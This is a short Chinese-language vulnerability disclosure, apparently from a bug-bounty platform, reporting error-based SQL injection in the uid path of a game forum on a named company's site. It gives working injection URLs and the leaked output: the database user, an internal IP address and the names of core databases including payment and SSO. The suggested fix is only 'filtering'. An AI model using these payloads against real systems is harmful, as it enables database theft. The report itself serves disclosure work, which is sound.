uid可以注入:code 区域http://game.letv.com/bbs/space-uid-(select(1)from(select count(*), concat(floor(rand(0)*2),0x5e5e5e,user()) x from information_schema.character_sets group by x)y).html
Error: Duplicate entry '1^^^letv@10.140.202.203' for key 'group_key'
漏洞证明:
数据库:code 区域letv_forum
letv_activity
letv_card
letv_cms
letv_factory_page
letv_intranet
letv_paycenter
letv_sso
letv_tools
可以看到是最核心的几个库。。。
论坛的members表:
http://game.letv.com/bbs/space-uid-(select(1)from(select count(*), concat(floor(rand(0)*2),0x5e5e5e,(select concat(table_name,0x5e5e,table_schema) from information_schema.tables limit 117,1),0x5e5e5e) x from information_schema.character_sets group by x)y).html
可以较方便地拖库,未进一步测试。修复方案:
过滤
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
